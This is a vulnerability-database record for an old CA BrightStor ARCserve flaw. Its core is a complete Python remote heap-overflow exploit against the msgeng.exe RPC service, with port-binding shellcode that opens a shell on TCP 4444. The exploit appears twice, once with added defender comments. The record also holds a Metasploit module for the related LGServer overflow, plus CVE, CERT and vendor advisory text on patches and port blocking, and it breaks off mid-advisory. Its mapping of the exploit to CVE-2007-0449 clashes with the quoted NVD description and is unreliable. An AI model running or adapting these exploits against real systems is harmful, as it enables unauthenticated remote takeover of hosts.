CA BrightStor ARCserve msgeng.exe Remote Heap Overflow Exploit
2007-01-27T00:00:00
ID EDB-ID:3211 Type exploitdb Reporter Winny Thomas Modified 2007-01-27T00:00:00
Description
CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit. CVE-2007-0449. Remote exploit for windows platform
#!/usr/bin/python
# I couldn't find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on Windows 2000 SP0. Opens a shell on TCP port 4444. Shouldn't be hard
# to port to other platforms. The exploit overwrites the
# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
# address of call dword ptr [esi +4C] located in user32.dll. At the time when
# UEF is called esi +4C contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import struct
import sys
def DCEconnectAndExploit(target):
    """Send one oversized DCE/RPC request to the msgeng.exe RPC endpoint on *target*.

    The function opens a TCP connection to port 6503, binds to DCE/RPC
    interface dc246bf0-7a7a-11ce-9f88-00805fe43838 version 1.0, builds a
    single request string and submits it as operation number 43. Nothing is
    returned and no reply is read; errors from impacket propagate to the
    caller.

    Defender-relevant observables visible in this code:
      * inbound TCP 6503 followed by a bind to the interface UUID above;
      * an opnum 43 request whose stub data starts with 676 "A" bytes and
        carries the two little-endian dwords 0x77E4FB7A and 0x77EE044C;
      * per the author's comments, a successful run leaves a listener on
        TCP 4444 on the target host.

    The two addresses are hard-coded for Windows 2000 SP0 (author's
    statement); on any other build the overwrite presumably corrupts the
    heap and crashes the service instead, which is itself worth alerting on.

    NOTE(review): the surrounding listing tags this script CVE-2007-0449,
    but the NVD text for that CVE quoted on the same page describes
    LGSERVER.EXE on TCP 1900/2200, not msgeng.exe on TCP 6503. Confirm the
    CVE mapping against the vendor advisory before using it for patch
    tracking.

    Args:
        target: host name or IP address passed straight to
            transport.TCPTransport.
    """
    # Transport and bind: these two values (port, interface UUID) are the
    # most stable network indicators in the script.
    trans = transport.TCPTransport(target, 6503)
    trans.connect()
    dce = dcerpc.DCERPC_v5(trans)
    dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
    # Filler that precedes the control data; the length 676 is taken as-is
    # from the author and is presumably the distance to the heap metadata
    # being overwritten -- TODO confirm against the advisory.
    request = "A" * 676
    request += "\x90\x90\x90\x90"
    # Bytes eb 0a encode an x86 short jump; presumably it hops over the two
    # packed addresses that follow so execution continues in the NOP run.
    request += "\x90\x90\xeb\x0a"
    # Author: address of a "call dword ptr [esi+4C]" instruction in user32.dll.
    request += struct.pack("<L", 0x77E4FB7A)
    # Author: location of the UnhandledExceptionFilter pointer in
    # Windows 2000 SP0; the value above is what gets written there.
    request += struct.pack("<L", 0x77EE044C)
    request += "\x90\x90\x90\x90" * 2
    # Opaque encoded payload. According to the author's comment it is
    # port-binding shellcode that opens a shell on TCP 4444; the bytes are
    # not decoded or verified here.
    request += "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
    request += "\x6f\xe3\x2a\x83\xeb\xfc\xe2\xf4\x1c\x05\x08\x67\x08\x96\x1c\xd5"
    request += "\x1f\x0f\x68\x46\xc4\x4b\x68\x6f\xdc\xe4\x9f\x2f\x98\x6e\x0c\xa1"
    request += "\xaf\x77\x68\x75\xc0\x6e\x08\x63\x6b\x5b\x68\x2b\x0e\x5e\x23\xb3"
    request += "\x4c\xeb\x23\x5e\xe7\xae\x29\x27\xe1\xad\x08\xde\xdb\x3b\xc7\x02"
    request += "\x95\x8a\x68\x75\xc4\x6e\x08\x4c\x6b\x63\xa8\xa1\xbf\x73\xe2\xc1"
    request += "\xe3\x43\x68\xa3\x8c\x4b\xff\x4b\x23\x5e\x38\x4e\x6b\x2c\xd3\xa1"
    request += "\xa0\x63\x68\x5a\xfc\xc2\x68\x6a\xe8\x31\x8b\xa4\xae\x61\x0f\x7a"
    request += "\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa"
    request += "\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28"
    request += "\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79"
    request += "\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb"
    request += "\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42"
    request += "\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63"
    request += "\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d"
    request += "\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a"
    request += "\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07"
    request += "\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5"
    request += "\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b"
    request += "\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa"
    request += "\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75"
    request += "\xb3\x90\x35\xd5\x30\x6f\xe3\x2a"
    # The whole buffer goes out as the stub data of operation 43 on the
    # bound interface; the response, if any, is never read.
    dce.call(43, request)
if __name__ == '__main__':
    # Script entry point (Python 2 syntax, as in the rest of the file).
    # Exactly one positional argument is consumed: the address handed to
    # DCEconnectAndExploit. Without it, print the usage line and exit -1.
    if len(sys.argv) < 2:
        print 'Usage: %s <target ip>\n' % sys.argv[0]
        sys.exit(-1)
    target = sys.argv[1]
    DCEconnectAndExploit(target)
# milw0rm.com [2007-01-27]
{"id": "EDB-ID:3211", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CA BrightStor ARCserve msgeng.exe Remote Heap Overflow Exploit", "description": "CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit. CVE-2007-0449. Remote exploit for windows platform", "published": "2007-01-27T00:00:00", "modified": "2007-01-27T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3211/", "reporter": "Winny Thomas", "references": [], "cvelist": ["CVE-2007-0449"], "lastseen": "2016-01-31T17:58:26", "viewCount": 11, "enchantments": {"score": {"value": 9.4, "vector": "NONE", "modified": "2016-01-31T17:58:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0449"]}, {"type": "cert", "idList": ["VU:611276", "VU:357308"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83087"]}, {"type": "exploitdb", "idList": ["EDB-ID:16400"]}, {"type": "saint", "idList": ["SAINT:AC07CF401B0C02203F9F5BD5BA41706E", "SAINT:17867A60CC8CA6EA88789A5EEAB306FD", "SAINT:C246974F40EAE8BFB0C170267BC4B213"]}, {"type": "osvdb", "idList": ["OSVDB:31593"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6903", "SECURITYVULNS:DOC:15821"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER"]}, {"type": "nessus", "idList": ["ARCSERVE_QO83833.NASL"]}], "modified": "2016-01-31T17:58:26", "rev": 2}, "vulnersScore": 9.4}, "sourceHref": "https://www.exploit-db.com/download/3211/", "sourceData": "#!/usr/bin/python\n# I couldnt find a reliable exploit for my analysis and so came up with this.\n# Remote exploit for the CA BrightStor msgeng.exe service heap overflow\n# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was\n# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard\n# to port to other platforms. 
The exploit overwrites the\n# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the\n# address of call dword ptr [esi +4C] located in user32.dll. At the time when\n# UEF is called esi +4C contains a pointer to our shellcode.\n#\n# Winny M Thomas ;-)\n# Author shall bear no responsibility for any screw ups caused by using this code\n\nfrom impacket.dcerpc import transport, dcerpc\nfrom impacket import uuid\nimport struct\nimport sys\n\ndef DCEconnectAndExploit(target):\n trans = transport.TCPTransport(target, 6503)\n trans.connect()\n dce = dcerpc.DCERPC_v5(trans)\n dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))\n\n request = \"A\" * 676\n request += \"\\x90\\x90\\x90\\x90\"\n request += \"\\x90\\x90\\xeb\\x0a\"\n\n #Call dword ptr [esi +4C] from user32.dll\n request += struct.pack(\"<L\", 0x77E4FB7A)\n #Overwrite UnhandledExceptionFilter in Windows 2000 SP0\n request += struct.pack(\"<L\", 0x77EE044C)\n request += \"\\x90\\x90\\x90\\x90\" * 2\n #Portbinding shellcode; Opens shell on TCP port 4444\n request += \"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xe0\"\n request += \"\\x6f\\xe3\\x2a\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x05\\x08\\x67\\x08\\x96\\x1c\\xd5\"\n request += \"\\x1f\\x0f\\x68\\x46\\xc4\\x4b\\x68\\x6f\\xdc\\xe4\\x9f\\x2f\\x98\\x6e\\x0c\\xa1\"\n request += \"\\xaf\\x77\\x68\\x75\\xc0\\x6e\\x08\\x63\\x6b\\x5b\\x68\\x2b\\x0e\\x5e\\x23\\xb3\"\n request += \"\\x4c\\xeb\\x23\\x5e\\xe7\\xae\\x29\\x27\\xe1\\xad\\x08\\xde\\xdb\\x3b\\xc7\\x02\"\n request += \"\\x95\\x8a\\x68\\x75\\xc4\\x6e\\x08\\x4c\\x6b\\x63\\xa8\\xa1\\xbf\\x73\\xe2\\xc1\"\n request += \"\\xe3\\x43\\x68\\xa3\\x8c\\x4b\\xff\\x4b\\x23\\x5e\\x38\\x4e\\x6b\\x2c\\xd3\\xa1\"\n request += \"\\xa0\\x63\\x68\\x5a\\xfc\\xc2\\x68\\x6a\\xe8\\x31\\x8b\\xa4\\xae\\x61\\x0f\\x7a\"\n request += \"\\x1f\\xb9\\x85\\x79\\x86\\x07\\xd0\\x18\\x88\\x18\\x90\\x18\\xbf\\x3b\\x1c\\xfa\"\n request += 
\"\\x88\\xa4\\x0e\\xd6\\xdb\\x3f\\x1c\\xfc\\xbf\\xe6\\x06\\x4c\\x61\\x82\\xeb\\x28\"\n request += \"\\xb5\\x05\\xe1\\xd5\\x30\\x07\\x3a\\x23\\x15\\xc2\\xb4\\xd5\\x36\\x3c\\xb0\\x79\"\n request += \"\\xb3\\x3c\\xa0\\x79\\xa3\\x3c\\x1c\\xfa\\x86\\x07\\xf2\\x76\\x86\\x3c\\x6a\\xcb\"\n request += \"\\x75\\x07\\x47\\x30\\x90\\xa8\\xb4\\xd5\\x36\\x05\\xf3\\x7b\\xb5\\x90\\x33\\x42\"\n request += \"\\x44\\xc2\\xcd\\xc3\\xb7\\x90\\x35\\x79\\xb5\\x90\\x33\\x42\\x05\\x26\\x65\\x63\"\n request += \"\\xb7\\x90\\x35\\x7a\\xb4\\x3b\\xb6\\xd5\\x30\\xfc\\x8b\\xcd\\x99\\xa9\\x9a\\x7d\"\n request += \"\\x1f\\xb9\\xb6\\xd5\\x30\\x09\\x89\\x4e\\x86\\x07\\x80\\x47\\x69\\x8a\\x89\\x7a\"\n request += \"\\xb9\\x46\\x2f\\xa3\\x07\\x05\\xa7\\xa3\\x02\\x5e\\x23\\xd9\\x4a\\x91\\xa1\\x07\"\n request += \"\\x1e\\x2d\\xcf\\xb9\\x6d\\x15\\xdb\\x81\\x4b\\xc4\\x8b\\x58\\x1e\\xdc\\xf5\\xd5\"\n request += \"\\x95\\x2b\\x1c\\xfc\\xbb\\x38\\xb1\\x7b\\xb1\\x3e\\x89\\x2b\\xb1\\x3e\\xb6\\x7b\"\n request += \"\\x1f\\xbf\\x8b\\x87\\x39\\x6a\\x2d\\x79\\x1f\\xb9\\x89\\xd5\\x1f\\x58\\x1c\\xfa\"\n request += \"\\x6b\\x38\\x1f\\xa9\\x24\\x0b\\x1c\\xfc\\xb2\\x90\\x33\\x42\\x10\\xe5\\xe7\\x75\"\n request += \"\\xb3\\x90\\x35\\xd5\\x30\\x6f\\xe3\\x2a\"\n\n dce.call(43, request)\n\nif __name__ == '__main__':\n try:\n target = sys.argv[1]\n except IndexError:\n print 'Usage: %s <target ip>\\n' % sys.argv[0]\n sys.exit(-1)\n\n DCEconnectAndExploit(target)\n\n# milw0rm.com [2007-01-27]\n", "osvdbidlist": ["31593"]}
{"cve": [{"lastseen": "2021-02-02T05:31:20", "description": "Multiple buffer overflows in LGSERVER.EXE in CA BrightStor ARCserve Backup for Laptops and Desktops r11.0 through r11.1 SP1, Mobile Backup r4.0, Desktop and Business Protection Suite r2, and Desktop Management Suite (DMS) r11.0 and r11.1 allow remote attackers to execute arbitrary code via crafted packets to TCP port (1) 1900 or (2) 2200.", "edition": 4, "cvss3": {}, "published": "2007-01-23T21:28:00", "title": "CVE-2007-0449", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0449"], "modified": "2018-10-16T16:32:00", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops:11.0", "cpe:/a:ca:desktop_management_suite:11.1", "cpe:/a:ca:desktop_protection_suite:2.0", "cpe:/a:ca:brightstor_mobile_backup:r4.0", "cpe:/a:ca:desktop_management_suite:11.0", "cpe:/a:ca:business_protection_suite:2.0", "cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops:11.1"], "id": "CVE-2007-0449", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0449", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ca:desktop_management_suite:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_mobile_backup:r4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:business_protection_suite:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup_laptops_desktops:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:desktop_protection_suite:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:desktop_management_suite:11.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:ca:brightstor_arcserve_backup_laptops_desktops:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup_laptops_desktops:11.1:sp1:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "SAINT:AC07CF401B0C02203F9F5BD5BA41706E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "type": "saint", "title": "BrightStor ARCserve LGServer buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "SAINT:C246974F40EAE8BFB0C170267BC4B213", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "title": "BrightStor ARCserve LGServer buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:46", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "edition": 2, "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "SAINT:17867A60CC8CA6EA88789A5EEAB306FD", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "type": "saint", "title": "BrightStor ARCserve LGServer buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:29", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0449"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83087", "href": "https://packetstormsecurity.com/files/83087/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Computer Associates BrightStor ARCserve Backup \nfor Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could \noverflow the buffer and execute arbitrary code. 
\n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-0449' ], \n[ 'OSVDB', '31593' ], \n[ 'BID', '22342' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 600, \n'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], \n], \n'DisclosureDate' => 'Jan 31 2007', \n'DefaultTarget' => 0)) \n \nregister_options([ Opt::RPORT(1900) ], self.class) \nend \n \ndef exploit \nconnect \n \nfiller = \"0000016705\" + rand_text_english(2322) \nseh = generate_seh_payload(target.ret) \nsploit = filler + seh + \"\\x58\" * 0x4141 \n \nprint_status(\"Trying target #{target.name}...\") \n \nsock.put(sploit) \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83087/lgserver.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "cvelist": ["CVE-2007-0449"], "description": "## Solution Description\nUpgrade to appropriate version recommended by the vendor or higher, as it has been reported to fix this vulnerability. 
An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp\nVendor Specific News/Changelog Entry: http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696\n[Secunia Advisory ID:23897](https://secuniaresearch.flexerasoftware.com/advisories/23897/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0545.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0683.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0684.html\nISS X-Force ID: 31704\nFrSIRT Advisory: ADV-2007-0314\n[CVE-2007-0449](https://vulners.com/cve/CVE-2007-0449)\nCERT VU: 611276\nCERT VU: 357308\nBugtraq ID: 22342\nBugtraq ID: 22340\n", "edition": 1, "modified": "2007-01-23T00:00:00", "published": "2007-01-23T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:31593", "id": "OSVDB:31593", "title": "CA BrightStor ARCserve Backup Multiple Overflows", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:54", "bulletinFamily": "info", "cvelist": ["CVE-2007-0449"], "description": "### Overview \n\nComputer Associates BrightStor ARCserve Backup contains a stack buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nComputer Associates BrightStor ARCserve Backup products come with a service called `LGSERVER.EXE`. This service listens on ports `2200/tcp` and `1900/tcp`. The LGSERVER.EXE process fails to properly validate data packets received on port `1900/tcp`, which can cause a stack buffer overflow. 
According to Computer Associates [CAID 34993](<http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696>), the following products are affected\n\n`BrightStor ARCserve:`\n\n`BrightStor ARCserve Backup for Laptops and Desktops r11.1 SP1` \n`BrightStor ARCserve Backup for Laptops and Desktops r11.1` \n`BrightStor ARCserve Backup for Laptops and Desktops r11.0` \n`BrightStor Mobile Backup r4.0``CA Protection Suites r2:`\n\n`CA Desktop Protection Suite r2` \n`CA Business Protection Suite r2` \n`CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2` \n`CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2``CA Desktop Management Suite:`\n\n`DMS r11.0` \n`DMS r11.1`Note that exploit code for this vulnerability is publicly available. \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with local SYSTEM privileges or cause a denial-of-service condition on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply an update** \nApply an update, as specified in Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). The following fixes are provided \n \n`BABLD r11.1 SP2 \u2013 SP2 does not contain the vulnerability, there is no fix to apply \nBABLD r11.1 SP1 - QO83833 \nBABLD r11.0 - QI85497 \nDMS r11.1 - QO85401 \nDMS r11.0 - QI85423 \nBMB r4.0 - QO85402` \n \n--- \n \n**Restrict access**\n\n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by the Discovery Service (typically `2200/tcp` and `1900/tcp`). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. 
The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Vendor Information\n\n611276\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Computer Associates __ Affected\n\nUpdated: January 31, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the [BrightStor Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23611276 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>\n * <http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696>\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34993>\n * <http://secunia.com/advisories/23897>\n * <http://xforce.iss.net/xforce/xfdb/31704>\n * <http://osvdb.org/displayvuln.php?osvdb_id=31593>\n\n### Acknowledgements\n\nThis vulnerability was disclosed by Computer Associates, who in turn credit NGSS.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0449](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-0449>) \n---|--- \n**Severity Metric:** | 25.74 \n**Date Public:** | 2007-01-23 
\n**Date First Published:** | 2007-01-31 \n**Date Last Updated: ** | 2007-02-02 20:18 UTC \n**Document Revision: ** | 15 \n", "modified": "2007-02-02T20:18:00", "published": "2007-01-31T00:00:00", "id": "VU:611276", "href": "https://www.kb.cert.org/vuls/id/611276", "type": "cert", "title": "Computer Associates BrightStor ARCserve Backup LGSERVER.EXE stack buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:42:55", "bulletinFamily": "info", "cvelist": ["CVE-2007-0449"], "description": "### Overview \n\nComputer Associates BrightStor ARCserve Backup contains a buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nComputer Associates BrightStor ARCserve Backup products come with a service called `LGSERVER.EXE`. This service listens on ports `2200/tcp` and `1900/tcp`. The LGSERVER.EXE process fails to properly validate the size of data received on port `2200/tcp`, which can cause heap memory corruption. According to Computer Associates [CAID 34993](<http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696>), the following products are affected\n\n`BrightStor ARCserve:`\n\n`BrightStor ARCserve Backup for Laptops and Desktops r11.1 SP1` \n`BrightStor ARCserve Backup for Laptops and Desktops r11.1` \n`BrightStor ARCserve Backup for Laptops and Desktops r11.0` \n`BrightStor Mobile Backup r4.0``CA Protection Suites r2:`\n\n`CA Desktop Protection Suite r2` \n`CA Business Protection Suite r2` \n`CA 